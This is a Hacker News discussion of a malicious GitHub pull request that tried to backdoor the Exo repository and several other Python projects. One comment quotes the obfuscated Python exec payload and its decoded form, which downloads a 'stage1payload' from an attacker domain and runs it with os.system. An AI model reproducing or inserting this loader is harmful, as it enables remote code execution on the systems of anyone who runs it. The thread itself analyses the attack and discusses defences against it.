[HN Gopher] Backdoor attempt on Exolabs GitHub repo through an i...
___________________________________________________________________
Backdoor attempt on Exolabs GitHub repo through an innocent looking
PR
Author : amrrs
Score : 85 points
Date : 2024-11-12 18:17 UTC (1 days ago)
(HTM) web link (twitter.com)
(TXT) w3m dump (twitter.com)
| josephcsible wrote:
| How is that innocent looking? exec(''.join(chr(x) for x in
| [...])) stands out like a sore thumb.
| bravetraveler wrote:
| No injection here, purely functional programming
| hypeatei wrote:
| It's not, I think the headline is for clicks and engagement.
| modeless wrote:
| The username is literally "evildojo666"
| thebears5454 wrote:
| Looks like he accidentally added a file. It's not "innocent"
| but definitely disguised by appearing as a readme only change
| ramon156 wrote:
| Even the PR is described as just a docs change
| babelfish wrote:
| The code in question:
|
| >>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,1
| 0,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,11
| 2,111\ ,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101
| ,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,11
| 7,101,115,11\ 6,46,117,114,108,111,112,101,110,40,34,104,116,116,
| 112,115,58,47,47,119,119,119,46,101,
| 118,105,108,100,111,106,111,46,99,111,109,47,11\ 5,116,97,103,101
| ,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,10
| 1,97,100,40,41,10,122,32,61,32,121,4,6,100,101,99,111,\ 00,101,40
| ,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,11
| 1,115,46,115,121,115,116,101,109,40,122,411,10])
|
| 'import os\nimport urllib\nimport urllib.request\nx = urllib.requ
| est.urlopen("https://www.evildojo.com/stage1payload")\ny =
| x.read()\nz = y\x04\x06decode("utf8")\nx.close()\nos.system(z)\n'
| moomin wrote:
| You ever get offended that the attacker is so obviously
| incompetent? At least put in the work like the xz attacker.
| leosanchez wrote:
| > At least put in the work like the xz attacker.
|
| There are very few people who can do that.
| squigz wrote:
| There are many people who could pull off an attack like
| that if they were so inclined.
| atq2119 wrote:
| You need ability, means (as in -- have the money to spend
| time on it), and motive. Many people have the ability.
| Many people have the means. (And there is some overlap,
| but the overlap isn't that large.) Few people have the
| motive.
|
| The combination of all three tends to mostly appear in
| nation states. They have the motive, and they have the
| money to fund people with the ability to pull off this
| kind of attack.
| bastardoperator wrote:
| Exactly, most of us need to work and aren't motivated
| enough to spend our free time committing crimes. I also
| assume this is full time work. From my limited
| perspective the hardest part was the time investment and
| gaining enough trust to put the code into action.
| swatcoder wrote:
| There are countless people who can do that and don't. There
| are almost certainly many people actively doing it still
| today. Thinking that the xz attack was extraordinary or
| difficult is a very big mistake.
|
| It's news cycle should have conveyed a sense of "oh shit,
| we really do need to be watching for discretely malicious
| contributors" not "whoa, I can't believe there was someone
| capable of that!" -- it seems like you learned the wrong
| lesson.
| telgareith wrote:
| I came to the realization over a year ago, that the only
| thing needed to be an "Advanced persistent threat" is an
| attention span. Not even a long one.
|
| Judging how many drive by's a random ipv4 address gets on
| aws, gcp, azure, or vultr- they get ignored if they get
| it wrong, and nobody notices until too late if they get
| it right.
| yapyap wrote:
| > There are very few people who can do that
|
| you're right. What made the XZ attacker rather unique is
| the fact they made useful contributions at first and only
| turned nasty later on.
|
| Not many people can keep a malicious campaign going on as
| long as the XZ attacker did which is why it's suspected to
| be a nation-backed attack
| teaearlgraycold wrote:
| Did anyone download the payload before it 404'd?
| dhx wrote:
| This account was spamming Python repositories with the same type
| of low value obvious backdoor spam.[1]
|
| Full list of attempted pull requests (all deleted seemingly by
| GitHub): 1
| https://www.github.com/KurtBestor/Hitomi-Downloader/pull/7638
| 2 https://www.github.com/home-assistant/core/pull/130423 3
| https://www.github.com/celery/celery/pull/9407 4
| https://www.github.com/chriskiehl/Gooey/pull/921 5
| https://www.github.com/crewAIInc/crewAI/pull/1582 6
| https://www.github.com/cumulo-autumn/StreamDiffusion/pull/177
| 7 https://www.github.com/AUTOMATIC1111/stable-diffusion-
| webui/pull/16646 8 https://www.github.com/Aider-
| AI/aider/pull/2343 9
| https://www.github.com/aboul3la/Sublist3r/pull/383 10
| https://www.github.com/plotly/dash/pull/3073 11
| https://www.github.com/soimort/you-get/pull/3034 12
| https://www.github.com/streamlink/streamlink/pull/6290 13
| https://www.github.com/jumpserver/jumpserver/pull/14440 14
| https://www.github.com/junyanz/pytorch-CycleGAN-and-
| pix2pix/pull/1684 15
| https://www.github.com/kornia/kornia/pull/3069 16
| https://www.github.com/langflow-ai/langflow/pull/4520 17
| https://www.github.com/exo-explore/exo/pull/432 18
| https://www.github.com/PostHog/posthog/pull/26144 19
| https://www.github.com/PrefectHQ/prefect/pull/15987 20
| https://www.github.com/pydantic/pydantic/pull/10822 21
| https://www.github.com/pyg-team/pytorch_geometric/pull/9777
| 22 https://www.github.com/qutebrowser/qutebrowser/pull/8379
| 23 https://www.github.com/tornadoweb/tornado/pull/3441 24
| https://www.github.com/ungoogled-software/ungoogled-
| chromium/pull/3092 25
| https://www.github.com/locustio/locust/pull/2980 26
| https://www.github.com/matterport/Mask_RCNN/pull/3057 27
| https://www.github.com/Stability-AI/generative-models/pull/425
| 28 https://www.github.com/yt-dlp/yt-dlp/pull/11520
|
| [1]
| https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPT...
| dilyevsky wrote:
| University of Minnesota at it again?
| ziddoap wrote:
| For those who don't get the reference, there was an incident
| where security research by University of Minnesota
| students/professors was conducted without communicating or
| receiving permission from anyone on the Linux side or from
| the Institutional Review Board (IRB).
|
| It raised a lot of questions about conducting ethical
| security research on open source projects, whether security
| research of this nature counts as an "experiment on people"
| (which has a lot more scrutiny, obviously), etc.
|
| _" [...] Lu and Wu explained that they'd been able to
| introduce vulnerabilities into the Linux kernel by submitting
| patches that appeared to fix real bugs but also introduced
| serious problems."_
|
| https://cse.umn.edu/cs/linux-incident
|
| https://www.theverge.com/2021/4/30/22410164/linux-kernel-
| uni...
| stratom wrote:
| Yes, really looks like someone conducting a study, or someone
| who wants to call out projects for their sloppy PR reviews.
| thebears5454 wrote:
| I think it looks like someone just ham fisting a known
| vulnerability trying to find one sucker who doesn't know
| what he's doing. If you're a jr with a learning projects
| maybe you'd approve the merge.
| dang wrote:
| Related. Others?
|
| _Threat actor attempted to slipstream a malware payload into yt-
| dlp 's GitHub repo_ -
| https://news.ycombinator.com/item?id=42121969 - Nov 2024 (5
| comments)
| FuriouslyAdrift wrote:
| The recently famous one is the XZ Tools takeover...
|
| https://en.wikipedia.org/wiki/XZ_Utils_backdoor
| sowbug wrote:
| It's so ham-handed that it reminds me of typical phishing emails,
| which are supposedly full of misspellings to filter out
| recipients who notice misspellings and aren't worth the trouble
| to try to scam.
| geraldcombs wrote:
| Maybe it's the hacking equivalent of Schrodinger's douchebag?
| If the hacking attempt succeeds, then you've achieved your
| goal. If it fails then you obviously joking or doing
| "research."
| almostdeadguy wrote:
| Et tu evildojo666?
| 38 wrote:
| banned
|
| https://github.com/evildojo666
| readyplayernull wrote:
| will next account be 667?
| edm0nd wrote:
| It's someone attempting to setup/frame someone else
|
| https://x.com/vxunderground/status/1856450468945506615
|
| https://x.com/evildojo666/status/1856413636748562827
| eli wrote:
| That makes a lot more sense than the headline. It doesn't look
| like a serious attempt and is not well obfuscated.
| Jerrrrrrry wrote:
| triple false-flags to sow/reap FUD
| jph wrote:
| GitHub repos of mine are seeing upticks in strange PRs that may
| be attacks. But the article's PR doesn't seem innocent at all;
| it's more akin to a huge dangerous red flag.
|
| If any GitHub teammates are reading here, open source repo
| maintainers (including me) really need better/stronger tools for
| potentially risky PRs and contributors.
|
| In order of importance IMHO:
|
| 1. Throttle PRs for new participants. For example, why is a new
| account able to send the same kinds of PRs to so many repos, and
| all at the same time?
|
| 2. Help a repo owner confirm that a new PR author is human and
| legit. For example, when a PR author submits their first PR to a
| repo, can the repo automatically do some kind of challenge such
| as a captcha prompt, or email confirmation, or multi-factor
| authentication, etc.?
|
| 3. Create across-repo across-organization flagging for risky PRs.
| For example, when a repo owner sees a PR that's questionable,
| currently the repo owner can report it to GitHub staff but that
| takes quite a while; instead, what if a repo owner can flag a PR
| as questionable, which in turn can propagate cautionary flags on
| similar PRs or similar author activity?
| cedws wrote:
| GitHub needs to step up its security game in general. 2FA
| should be made mandatory. GitHub "Actions" are a catastrophe
| waiting to happen - very few people pin Actions to a specific
| commit, they use a tag of the Action that can be moved at will.
| A malicious author could instantaneously compromise thousands
| of pipelines with a single commit. Also, PR diffs often hide
| entire files by default - why!?!
|
| Maybe accounts should even require ID verification. We can't
| afford to fuck around anymore, a significant share of the
| world's software supply chain lives on GitHub. It's time to
| take things seriously.
| aliasxneo wrote:
| The rampant "@V1" usage for GitHub Actions has always been so
| disturbing to me. Even better is the fact that GitHub does
| all of the work of showing you who is actually using the
| action! So just compromise the account and then start
| searching for workflows with authenticated web tokens to AWS
| or something similar.
|
| It's probably already happening.
| cedws wrote:
| Exactly.
|
| It simply should not be allowed to do this. Nor maintain
| Actions without mandatory 2FA. All it takes is one account
| to be compromised to infect thousands of pipelines.
| Thousands of pipelines can be used to infect thousands of
| repos. Thousands of repos can be used to infect thousands
| of accounts... ad infinitum.
| axus wrote:
| What's next, checking that Releases match the code on Github?
| webdevladder wrote:
| Also the heuristic used to collapse file diffs makes it so
| that the most important change in a PR often can't be seen or
| ctrl-f'd without clicking first.
| blueflow wrote:
| 2FA is already mandatory on GitHub.
| darth_avocado wrote:
| Step 1: Automatically reject PRs from usernames like
| "evildojo666"
| SoftTalker wrote:
| Another vulnerability of the GitHub monoculture. Attackers
| wanting to automate attempts to subvert open-source projects only
| have to focus on one system.
| xyst wrote:
| It's not even subtle. How crude. I guess even the state govs are
| outsourcing their work to script kiddies
| ziddoap wrote:
| Did I miss the evidence that this is state-backed?
| edm0nd wrote:
| lol this is a troll by someone who hates someone else and is
| setting them up.
|
| Zero nation-states are involved in this.
| chollida1 wrote:
| That seems pretty clumsy. Even a first year employee would catch
| that in a code review.
|
| Not sure how hte OP describes that as innocent looking.
|
| obfuscated code, check
|
| use of eval, check
|
| How was that innocent looking?
| zb3 wrote:
| Title is misleading, it's an exec that's not hidden in any way.
| indulona wrote:
| anyone who does not review patches before accepting them
| deservers to suffer consequences of their laziness.
| angoragoats wrote:
| Please stop using and linking to Twitter; it's a cesspool of
| trolls and fascist scumbags.
| blueflow wrote:
| Shunning them and cutting them out will not make them vote in
| your favor. Whats the endgame of this?
| angoragoats wrote:
| What? It has nothing to do with voting. The endgame is to
| watch Twitter die, hopefully as soon as possible. This way
| the scum that the current owner not only allows on the
| platform, but actively promotes in some cases, crawl back
| into their holes.
___________________________________________________________________
(page generated 2024-11-13 23:01 UTC)